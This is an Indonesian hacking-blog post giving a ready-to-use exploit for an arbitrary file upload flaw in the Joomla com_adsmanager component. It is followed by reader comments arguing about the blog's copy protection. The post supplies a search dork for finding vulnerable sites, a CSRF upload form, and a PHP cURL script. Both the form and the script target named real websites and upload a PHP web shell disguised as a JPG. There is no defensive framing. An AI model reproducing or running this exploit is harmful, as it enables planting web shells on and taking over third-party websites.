Joomla Com_Adsmanager Vulnerability





#- Dork : inurl:com_adsmanager

#- Exploit : /index.php?option=com_adsmanager&task=upload&tmpl=component

#- Vulnerable :
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}

*Note : Jangan lupa Edit Shellnya Shell.jpg

POC : 

With CSRF / Uploadify 

CSRF :

<form method="POST" action="http://www.muslimbizads.com/index.php?option=com_adsmanager&task=upload&tmpl=component"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>

Uploadify : 

<?php
$url = "http://shelbygrossman.com/wp-content/plugins/the-viddler-wordpress-plugin/js/plupload/examples/upload.php"; // put URL Here$post = array(       "file" => "@jiwax.jpg",       "name" => "jiwa.php");$ch = curl_init ("$url");curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt ($ch, CURLOPT_POST, 1);@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);$data = curl_exec ($ch);curl_close ($ch);echo $data;
?>




#- Shell Result : Here !

Kami update trik tutorial setiap hari, Jangan Sampai Ketinggalan

2 Responses to "Joomla Com_Adsmanager Vulnerability"

  1. "Saya tidak meminta satu rupiah pun dari anda, Tolong hargai Copyright konten yang ditulis oleh Admin, Jika ingin Copy-Paste tolong sertakan link sumber. Terimakasih :)"

    mikir dikit lah
    bilang saya tidak meminta satu rupiah pun dari anda tapi di pasang one click ads
    bilang jika ingin copy- paste tolong sertakan link sumber ehh kontol artikel lu gak bisa di copy gblk
    hapus aja nih blog kalo ngeshare poc tapi di aktifin anti copy paste
    :) gak guna kntl

    BalasHapus
    Balasan
    1. Mohon maaf atas kekurangannya. Dulu sesudah artikel ini di publish memang blm di pasang anticopas, baru beberapa bulan kemudian karena ada AGC makanya di pasang anti copas. Anda pemain baru ya ? mending diam saja tolong di jaga dek omongannnya. Kalo blog ini gak guna kok masih nengok ilmu kesini ? btw adek marah ya, karna gak bisa KOPAS blog ini ? wkwk. Makasih sarannya :)

      Hapus

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

• Join Grup 3xploi7 : Here 
• Tonton Streaming Tv : Here